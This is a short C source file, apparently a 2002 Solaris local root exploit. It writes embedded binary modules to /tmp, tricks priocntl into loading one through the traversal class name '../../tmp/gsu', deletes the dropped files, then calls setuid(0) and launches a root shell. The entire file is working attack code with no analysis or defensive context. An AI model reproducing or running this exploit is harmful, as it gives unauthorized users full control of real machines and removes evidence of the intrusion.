/*
 * Copyright (C) 2001-2002 by jerryhj.
 */
#pragma ident "@(#)$Id: rgsu.c,v 0.0.0.1 2002/05/24 $"

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/procset.h>
#include <sys/priocntl.h>
#include <sys/iapriocntl.h>
#include <errno.h>

#define GSUNAME "/tmp/gsu"
#define GSUNAME_V9 "/tmp/sparcv9/gsu"
#define GSUPATH_V9 "/tmp/sparcv9"

#define GSULEN 0x000003c8
#define GSULEN_V9 0x000005b8
extern char gsu[];
extern char gsu_v9[];

typedef struct {
	unsigned int MAGIC_NUM1;
	pid_t gsu_id;
	unsigned int MAGIC_NUM2; 
} magic_pid_t;
static magic_pid_t magic_pid = {0x19760122, 0x8888, 0x94070125};

int modi_gsu(char *p, int nlen, pid_t pid)
{
	int i;
	for(i = 0; i < nlen - sizeof(magic_pid_t); i++) {
		if(memcmp(p + i, &magic_pid, sizeof(magic_pid_t)) == 0) {
			magic_pid.gsu_id = pid;
			memcpy(p + i, &magic_pid, sizeof(magic_pid_t));
			magic_pid.gsu_id = 0x8888;
			return 1;
		}
	}
	
	return 0;
}

int main()
{
	pcinfo_t pcinfo;
	pid_t pid;
	FILE *p;

	pid = getpid();
	if(!modi_gsu(gsu, GSULEN, pid)) {
		printf("modified pid in %s failed!\n", GSUNAME);
		return -1;
	}
	if(!modi_gsu(gsu_v9, GSULEN_V9, pid)) {
		printf("modified pid in %s failed!\n", GSUNAME_V9);
		return -1;
	}
	
	if((p = fopen(GSUNAME,"w")) == 0) {
		printf("create %s error![errno = %d]\n", GSUNAME ,errno);
		return -1;
	}
	if(fwrite(gsu, GSULEN, 1, p) == 0) {
		printf("write to %s error![errno = %d]\n", GSUNAME, errno);
		fclose(p);
		return -1;
	}
	fclose(p);

	mkdir(GSUPATH_V9, 0777);
	if((p = fopen(GSUNAME_V9, "w")) == 0) {
		printf("create %s error![errno = %d]\n", GSUNAME_V9 ,errno);
		return -1;
	}
	if(fwrite(gsu_v9, GSULEN_V9, 1, p) == 0) {
		printf("write to %s error![errno = %d]\n", GSUNAME_V9, errno);
		fclose(p);
		return -1;
	}
	fclose(p);
	
	strcpy(pcinfo.pc_clname, "../../tmp/gsu");
	priocntl(0, 0, PC_GETCID, (caddr_t)&pcinfo);
	unlink(GSUNAME);
	unlink(GSUNAME_V9);
	rmdir(GSUPATH_V9);

	setuid(0);
	system("/bin/sh");
}
